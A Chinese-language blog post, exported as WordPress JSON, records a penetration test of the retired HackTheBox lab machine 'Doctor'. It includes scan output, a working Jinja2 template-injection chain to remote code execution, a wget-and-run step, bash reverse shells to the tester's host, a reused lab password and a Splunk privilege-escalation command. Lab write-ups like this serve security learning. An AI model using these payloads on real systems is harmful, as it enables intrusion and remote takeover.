{"id":189,"date":"2024-11-13T11:00:53","date_gmt":"2024-11-13T03:00:53","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=189"},"modified":"2024-11-13T11:00:54","modified_gmt":"2024-11-13T03:00:54","slug":"189","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/189\/","title":{"rendered":"HTB\u9776\u673a Doctor \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.209<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.10.10.209 (10.10.10.209) 56(84) bytes of data.\n64 bytes from 10.10.10.209: icmp_seq=1 ttl=63 time=127 ms\n64 bytes from 10.10.10.209: icmp_seq=2 ttl=63 time=108 ms\n64 bytes from 10.10.10.209: icmp_seq=3 ttl=63 time=115 ms\n64 bytes from 10.10.10.209: icmp_seq=4 ttl=63 time=107 ms\n\n--- 10.10.10.209 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3293ms\nrtt min\/avg\/max\/mdev = 107.232\/114.353\/127.308\/8.099 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u901a\u4fe1\u72b6\u6001\u6b63\u5e38\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Fri Oct 25 14:55:53 2024 as: nmap -sA -p- --min-rate 4000 -oN .\/ack_report.txt 10.10.10.209\nNmap scan report for 10.10.10.209\nHost is up (0.17s latency).\nNot shown: 65532 filtered tcp ports (no-response)\nPORT     STATE      SERVICE\n22\/tcp   unfiltered ssh\n80\/tcp   unfiltered http\n8089\/tcp unfiltered unknown\n\n# Nmap done at Fri Oct 25 14:56:48 2024 -- 1 IP address (1 host up) scanned in 54.14 seconds<\/code><\/pre>\n
\u9776\u673a\u5f00\u653e\u4e863<\/code>\u4e2aTCP<\/code>\u7aef\u53e3\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Fri Oct 25 14:58:25 2024 as: nmap -sS -sV -A -p 22,80,8089 -oN .\/tcp_report.txt 10.10.10.209\nNmap scan report for 10.10.10.209\nHost is up (0.096s latency).\n\nPORT     STATE SERVICE  VERSION\n22\/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)\n|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)\n|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)\n80\/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Doctor\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n8089\/tcp open  ssl\/http Splunkd httpd\n|_http-title: splunkd\n|_http-server-header: Splunkd\n| ssl-cert: Subject: commonName=SplunkServerDefaultCert\/organizationName=SplunkUser\n| Not valid before: 2020-09-06T15:57:27\n|_Not valid after:  2023-09-06T15:57:27\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|specialized\nRunning (JUST GUESSING): Linux 5.X|4.X|2.6.X (95%), Crestron 2-Series (86%)\nOS CPE: cpe:\/o:linux:linux_kernel:5.0 cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:2.6.32 cpe:\/o:crestron:2_series\nAggressive OS guesses: Linux 5.0 (95%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.0 - 5.5 (88%), Linux 5.3 - 5.4 (88%), Linux 2.6.32 (87%), Crestron XPanel control system (86%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT      ADDRESS\n1   93.62 ms 10.10.14.1\n2   94.23 ms 10.10.10.209\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Oct 25 14:59:25 2024 -- 1 IP address (1 host up) scanned in 59.35 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Fri Oct 25 15:10:22 2024 as: nmap -sU -p- --min-rate 4000 -oN .\/udp_ports.txt 10.10.10.209\nNmap scan report for 10.10.10.209\nHost is up (0.099s latency).\nNot shown: 65533 open|filtered udp ports (no-response)\nPORT     STATE  SERVICE\n80\/udp   closed http\n8089\/udp closed unknown\n\n# Nmap done at Fri Oct 25 15:10:56 2024 -- 1 IP address (1 host up) scanned in 33.59 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aUbuntu Linux<\/code>\uff0c\u5e76\u90e8\u7f72\u4e86Splunk<\/code>\u4f01\u4e1a\u65e5\u5fd7\u6536\u96c6\u7cfb\u7edf\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/doctor]\n\u2514\u2500# nc -nv 10.10.10.209 22\n(UNKNOWN) [10.10.10.209] 22 (ssh) open\nSSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1<\/code><\/pre>\n
Splunk\u65e5\u5fd7\u76d1\u89c6\u7cfb\u7edf\uff088089\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u9875\u9762\uff1ahttps:\/\/doctor.htb:8089\/<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u8be5\u7aef\u53e3\u4e0a\u8fd0\u884c\u7740Splunk v8.0.5<\/code>\u4f01\u4e1a\u65e5\u5fd7\u76d1\u89c6\u7cfb\u7edf\uff0c\u8054\u7f51\u641c\u7d22\u6f0f\u6d1e\uff0c\u53d1\u73b0\u8be5\u7cfb\u7edf\u5b58\u5728\u6388\u6743\u7684\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3aCVE-2023-46214<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u4e3b\u7ad9\u4fe1\u606f\u6536\u96c6<\/h3>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/doctor.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u5728\u9875\u9762\u4e0a\u6536\u96c6\u4fe1\u606f\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a\u7535\u5b50\u90ae\u7bb1\uff1ainfo@doctors.htb<\/code>\u3002\u5c1d\u8bd5\u70b9\u51fb\u9876\u680f\u4e0a\u7684\u94fe\u63a5\uff0c\u53d1\u73b0\u867d\u7136\u9875\u9762\u540d\u79f0\u4e0d\u540c\uff0c\u4f46\u5185\u5bb9\u5b8c\u5168\u4e00\u81f4\u3002<\/p>\n
\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Sat Oct 26 09:43:18 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/doctor.htb\/ -x 400,403,404 -t 60 -e php,js,html,txt,zip,tar.gz,pcap\n\n301   305B   http:\/\/doctor.htb\/js    -> REDIRECTS TO: http:\/\/doctor.htb\/js\/\n301   306B   http:\/\/doctor.htb\/css    -> REDIRECTS TO: http:\/\/doctor.htb\/css\/\n301   308B   http:\/\/doctor.htb\/fonts    -> REDIRECTS TO: http:\/\/doctor.htb\/fonts\/\n301   309B   http:\/\/doctor.htb\/images    -> REDIRECTS TO: http:\/\/doctor.htb\/images\/\n200   621B   http:\/\/doctor.htb\/images\/\n200   731B   http:\/\/doctor.htb\/js\/<\/code><\/pre>\n
\u4f46\u672a\u53d1\u73b0\u654f\u611f\u4fe1\u606f\u3002<\/p>\n
\u65c1\u7ad9\u4fe1\u606f\u6536\u96c6<\/h3>\n
\u6839\u636e\u6536\u96c6\u5230\u7684\u90ae\u7bb1\u540d\uff0c\u5c1d\u8bd5\u4ee5doctors.htb<\/code>\u57df\u540d\u8bbf\u95ee\u9776\u673aWeb<\/code>\u670d\u52a1\uff1a<\/p>\n
\"\"<\/p>\n
\u5c1d\u8bd5\u5bf9\u767b\u5f55\u3001\u6ce8\u518c\u548c\u627e\u56de\u5bc6\u7801\u529f\u80fd\u8fdb\u884cSQL<\/code>\u6ce8\u5165\u6d4b\u8bd5\uff0c\u5931\u8d25\u3002\u76f4\u63a5\u6ce8\u518c\u7528\u6237\u767b\u5f55\uff1a<\/p>\n
\"\"<\/p>\n
\u5728\u4e3b\u9875\u4e0a\u53d1\u73b0New Message<\/code>\u94fe\u63a5\uff0c\u70b9\u51fb\u540e\u8df3\u8f6c\u5230\u535a\u6587\u53d1\u5e03\u754c\u9762\uff1a<\/p>\n
\"\"<\/p>\n
\u5c1d\u8bd5\u5728\u6587\u7ae0\u6807\u9898\u548c\u5185\u5bb9\u533a\u5185\u5199\u5165XSS<\/code>\u6d4b\u8bd5Payload<\/code>\uff0c\u70b9\u51fb\u53d1\u5e03\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0Payload<\/code>\u88ab\u8f6c\u4e49\u3002\u5c1d\u8bd5\u5728\u6ce8\u518c\u9875\u3001\u7528\u6237\u4fe1\u606f\u66f4\u65b0\u9875\u7b49\u5904\u8fdb\u884cSQL<\/code>\u3001XSS<\/code>\u548c\u5782\u76f4\u8d8a\u6743\u7b49\u653b\u51fb\uff0c\u5747\u544a\u5931\u8d25\u3002<\/p>\n
\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Sat Oct 26 10:53:45 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/doctors.htb\/ -x 400,403,404 -t 60 -e py,pyc,js,html,txt,zip,tar.gz,pcap\n\n302   251B   http:\/\/doctors.htb\/account    -> REDIRECTS TO: http:\/\/doctors.htb\/login?next=%2Faccount\n200   101B   http:\/\/doctors.htb\/archive\n302   245B   http:\/\/doctors.htb\/home    -> REDIRECTS TO: http:\/\/doctors.htb\/login?next=%2Fhome\n200     4KB  http:\/\/doctors.htb\/login\n302   217B   http:\/\/doctors.htb\/logout    -> REDIRECTS TO: http:\/\/doctors.htb\/home\n200     4KB  http:\/\/doctors.htb\/register\n200     3KB  http:\/\/doctors.htb\/user\/admin<\/code><\/pre>\n
\u53d1\u73b0\u4e00\u4e2a\u76ee\u5f55\/archive<\/code>\uff0c\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n
\"\"<\/p>\n
\u76ee\u6d4b\u8be5\u7aef\u70b9\u4e3a\u535a\u5ba2RSS<\/code>\u6570\u636e\u63a5\u53e3\uff0c\u63a5\u53e3\u4f1a\u8fd4\u56de\u5f53\u524d\u7528\u6237\u53d1\u5e03\u7684\u6240\u6709\u5e16\u5b50\u7684\u6807\u9898\u3002\u7ecf\u8fc7XSS<\/code>\u6d4b\u8bd5\uff0c\u53d1\u73b0\u867d\u7136\u8be5\u6570\u636e\u63a5\u53e3\u672a\u8fc7\u6ee4XSS<\/code>\u7b26\u53f7\uff0c\u4f46\u7531\u4e8e\u6587\u6863\u5f00\u5934\u7684XML<\/code>\u683c\u5f0f\u58f0\u660e\uff0cPayload<\/code>\u65e0\u6cd5\u6267\u884c\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
Python SSTI\u6a21\u677f\u6ce8\u5165\u653b\u51fb<\/h2>\n
**SSTI**<\/code>\u670d\u52a1\u5668\u7aef\u6a21\u677f\u6ce8\u5165\u662f\u653b\u51fb\u8005\u5229\u7528\u539f\u751f\u6a21\u677f\u8bed\u6cd5\u5c06\u6076\u610f\u4ee3\u7801\u6ce8\u5165\u5230\u53ef\u4ee5\u5728\u670d\u52a1\u5668\u7aef\u6267\u884c\u7684\u6a21\u677f\u4e2d\u7684\u8fc7\u7a0b \u3002<\/strong>\u5728\u73b0\u4ee3Web<\/code>\u5f00\u53d1\u4e2d\uff0c\u5f00\u53d1\u8005\u901a\u5e38\u4f1a\u5c06\u524d\u7aef\u9759\u6001\u6587\u6863\u4fdd\u5b58\u4e3a\u6837\u4f8b\u6587\u4ef6\uff0c\u5e76\u5728\u6587\u6863\u7684\u5173\u952e\u6570\u636e\u4f4d\u7f6e\u4f7f\u7528{}<\/code>\u7b26\u53f7\u8fdb\u884c\u5360\u4f4d\uff1b\u968f\u540e\u5728\u540e\u7aef\u5f00\u53d1\u4e2d\uff0c\u4f7f\u7528Jinja2<\/code>\u7b49\u6a21\u677f\u89e3\u6790\u5f15\u64ce\u5c06\u6a21\u677f\u4ee3\u7801\u6587\u4ef6\u548c\u540e\u7aef\u7a0b\u5e8f\u53d8\u91cf\u7ed1\u5b9a\u540e\u8fdb\u884c\u9875\u9762\u6e32\u67d3\uff0c\u5176\u539f\u7406\u7c7b\u4f3c\u4e8eSQL<\/code>\u9884\u7f16\u8bd1\u67e5\u8be2\u3002\u4f46\u5982\u679c\u5f00\u53d1\u8005\u76f4\u63a5\u5c06\u53d8\u91cf\u63d2\u5165\u5230\u6a21\u677f\u4ee3\u7801\u5185\uff0c\u5c31\u4f1a\u9020\u6210SSTI RCE<\/code>\u6f0f\u6d1e\u3002\u901a\u5e38\u60c5\u51b5\u4e0b\uff0c{{}}<\/code>\u53cc\u91cd\u82b1\u62ec\u53f7\u5185\u7684\u5185\u5bb9\u4f1a\u88ab\u6a21\u677f\u5f15\u64ce\u5f53\u4f5c\u4ee3\u7801\u6267\u884c\uff0c\u5982\u679c\u653b\u51fb\u8005\u4f20\u5165\u4e86\u6b64\u7c7b\u6570\u636e\uff0c\u5c31\u53ef\u4ee5\u8fbe\u5230\u4ee3\u7801\u6267\u884c\u7684\u6548\u679c\u3002<\/p><\/blockquote>\n
\u8003\u8651\u5230\u9776\u673aWeb<\/code>\u670d\u52a1\u7531Python<\/code>\u6784\u5efa\uff0c\u5e76\u4e14\u67092<\/code>\u4e2a\u63a5\u53e3\u53ef\u4ee5\u67e5\u770b\u5230\u7528\u6237\u521b\u5efa\u5e16\u5b50\u7684\u6807\u9898\u5185\u5bb9\uff0c\u51b3\u5b9a\u5c1d\u8bd5\u8fdb\u884cSSTI<\/code>\u6a21\u677f\u6ce8\u5165\u653b\u51fb\u3002\u56e0\u4e3a\u540e\u7aef\u53ef\u80fd\u5b58\u5728\u5c06\u672a\u7ecf\u8fc7\u6ee4\u7684\u6807\u9898\u6570\u636e\u4ece\u540e\u7aef\u53d6\u51fa\uff0c\u5e76\u76f4\u63a5\u63d2\u5165\u5230\u6a21\u677f\u4ee3\u7801\u4e2d\u7684\u60c5\u51b5\u5b58\u5728\u3002\u6d4b\u8bd5Payload<\/code>\u5982\u4e0b\uff1a<\/p>\n
{{config}}<\/code><\/pre>\n
\u521b\u5efa\u65b0\u5e16\u5b50\uff0c\u5c06\u6807\u9898\u5185\u5bb9\u4fee\u6539\u4e3aPayload<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u53ef\u4ee5\u770b\u5230\u4e3b\u9875\u5904\u65e0\u6cd5\u5229\u7528\uff0c\u5c1d\u8bd5\u8bbf\u95ee\/archive<\/code>\u63a5\u53e3\uff1a<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u786e\u8ba4<\/strong>**\/archive**<\/code>\u63a5\u53e3\u5904\u5b58\u5728<\/strong>**SSTI**<\/code>\u6f0f\u6d1e\uff01\uff01<\/strong><\/p>\n
\u63a5\u4e0b\u6765\u9700\u8981\u6784\u9020Payload<\/code>\uff0c\u83b7\u53d6\u9776\u673aPython<\/code>\u7684\u6240\u6709\u7c7b\u5e93\uff1a<\/p>\n
{{''.__class__.__base__.__subclasses__()}}<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u83b7\u53d6\u6240\u6709\u7c7b\u5e93\u540d\u79f0\uff01\u63a5\u4e0b\u6765\u6211\u4eec\u9700\u8981\u4f7f\u7528HTML<\/code>\u5b9e\u4f53\u5b57\u7b26\u89e3\u7801\u5de5\u5177\u89e3\u7801\u8fd4\u56de\u7684Python<\/code>\u5185\u7f6e\u5e93\u5217\u8868\uff0c\u5c06\u5176\u4fdd\u5b58\u5728\u6587\u4ef6\u4e2d\uff0c\u5e76\u7f16\u5199Python<\/code>\u811a\u672c\u6765\u67e5\u627ewarning.catch_warnings<\/code>\u7c7b\u5e93\u7684\u7d22\u5f15\u4f4d\u7f6e\u3002\u8be5\u7c7b\u5e93\u5b58\u5728eval()<\/code>\u51fd\u6570\uff0c\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff1a<\/p>\n
\"\"<\/p>\n
#! \/usr\/bin\/python3\npylib_list = \"\"\nwith open(\".\/pylib.lst\",'r') as f:\n    pylib_list = f.read().strip('n').split(\", \")\n\nfor i in range(0, len(pylib_list)):\n    if pylib_list[i] == \"<class 'warnings.catch_warnings'>\":\n        print(\"[+] warnings.catch_warnings: INDEX %d\" %(i))<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u83b7\u53d6warnings.catch_warnings<\/code>\u7c7b\u5728\u5168\u5c40\u7c7b\u5e93\u5217\u8868\u4e2d\u7684\u7d22\u5f15\u53f7\u4e3a185<\/code>\uff0c\u76f4\u63a5\u4f7f\u7528__init__<\/code>\u3001__globals__<\/code>\u548c__builtins__<\/code>\u65b9\u6cd5\u52a0\u8f7d\u8be5\u7c7b\u4e2d\u7684eval()<\/code>\u51fd\u6570\uff0c\u5e76\u4f7f\u7528__import__<\/code>\u65b9\u6cd5\u52a0\u8f7dos<\/code>\u5e93\u6267\u884csystem<\/code>\u51fd\u6570\uff1a<\/p>\n
{{''.__class__.__base__.__subclasses__()[185].__init__.__globals__.__builtins__['eval'](\"__import__('os').popen('id').read()\")}}<\/code><\/pre>\n
\"\"<\/p>\n
\u6267\u884c\u547d\u4ee4\u6210\u529f\uff01\uff01\u63a5\u4e0b\u6765\u76f4\u63a5\u53cd\u5f39Shell\uff08\u9700\u8981\u4ece\u9776\u673a\u4e0a\u4e0b\u8f7d\u53cd\u5f39Shell\u811a\u672c\u5e76\u6267\u884c\uff09\uff1a<\/p>\n
{{''.__class__.__base__.__subclasses__()[185].__init__.__globals__.__builtins__['eval'](\"__import__('os').system('wget http:\/\/10.10.14.2\/reverse443.sh -O \/tmp\/reverse443.sh && chmod +x \/tmp\/reverse443.sh && \/tmp\/reverse443.sh')\")}}<\/code><\/pre>\n
#! \/bin\/bash\n\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.2\/443 0>&1'<\/code><\/pre>\n
\"\"<\/p>\n
\u53cd\u5f39Shell\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
\u672c\u5730\u4fe1\u606f\u6536\u96c6<\/h2>\n
\u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n
\"\"<\/p>\n
\u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n
\"\"<\/p>\n
\u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n
\"\"<\/p>\n
\u73af\u5883\u53d8\u91cf<\/strong><\/p>\n
\"\"<\/p>\n
\u7528\u6237\u4fe1\u606f<\/strong><\/p>\n
\"\"<\/p>\n
\u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n
\"\"<\/p>\n
\u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n
\"\"<\/p>\n
\u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n
\"\"<\/p>\n
\u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n
\"\"<\/p>\n
Capabilities\u7279\u6743<\/strong><\/p>\n
\"\"<\/p>\n
\u654f\u611f\u65e5\u5fd7\u5185\u5bb9<\/strong><\/p>\n
\"\"<\/p>\n
\u7ecf\u5206\u6790\u7814\u5224\uff0c\u53d1\u73b0\u9776\u673aSplunk<\/code>\u4f01\u4e1a\u65e5\u5fd7\u5206\u6790\u7cfb\u7edf\u7531root<\/code>\u7528\u6237\u8fd0\u884c\uff0c\u51b3\u5b9a\u901a\u8fc7Splunk<\/code>\u81ea\u5b9a\u4e49\u547d\u4ee4\u8fdb\u884c\u63d0\u6743\u3002\u540c\u65f6\u5c1d\u8bd5\u4f7f\u7528HTTP<\/code>\u65e5\u5fd7\u4e2d\u53d1\u73b0\u7684\u5bc6\u7801\u3002<\/p>\n
\u79fb\u52a8\u81f3shaun\u7528\u6237<\/h2>\n
\u5c1d\u8bd5\u4f7f\u7528HTTP<\/code>\u65e5\u5fd7\u4e2d\u53d1\u73b0\u7684\u5bc6\u7801\u767b\u5f55\u81f3shaun<\/code>\u7528\u6237\uff1a<\/p>\n
    \n
  • \u7528\u6237\u540d\uff1ashaun<\/code><\/li>\n
  • \u5bc6\u7801\uff1aGuitar123<\/code><\/li>\n<\/ul>\n
    \"\"<\/p>\n
    Splunk\u63d0\u6743<\/h2>\n
    \u901a\u8fc7\u8054\u7f51\u641c\u7d22\uff0c\u53d1\u73b0\u4e86\u4e00\u4efd\u8fdc\u7a0b\u767b\u5f55Splunk<\/code>\u5e76\u4e0a\u4f20\u90e8\u7f72\u53cd\u5f39Shell\u7a0b\u5e8f\u7684Python<\/code>\u811a\u672cPySplunkWhisperer2<\/code>\uff1a<\/p>\n
    \"\"<\/p>\n
    \u76f4\u63a5\u4e0b\u8f7d\uff1a<\/p>\n
    wget https:\/\/raw.githubusercontent.com\/cnotin\/SplunkWhisperer2\/refs\/heads\/master\/PySplunkWhisperer2\/PySplunkWhisperer2_python3.py<\/code><\/pre>\n
    \u968f\u540e\u5c06\u653b\u51fb\u811a\u672c\u4e0a\u4f20\u81f3\u9776\u673a\uff0c\u5e76\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n
    .\/exp.py --username shaun --password Guitar123 --payload \"\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.2\/4444 0>&1'\"<\/code><\/pre>\n
    \"\"<\/p>\n
    \u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
    \n
    Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
    \"\"<\/p>\n
    \n
    \u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
    \n","protected":false},"excerpt":{"rendered":"
    \u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.209 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.209 (10.10.10.20 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-189","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=189"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/189\/revisions"}],"predecessor-version":[{"id":190,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/189\/revisions\/190"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}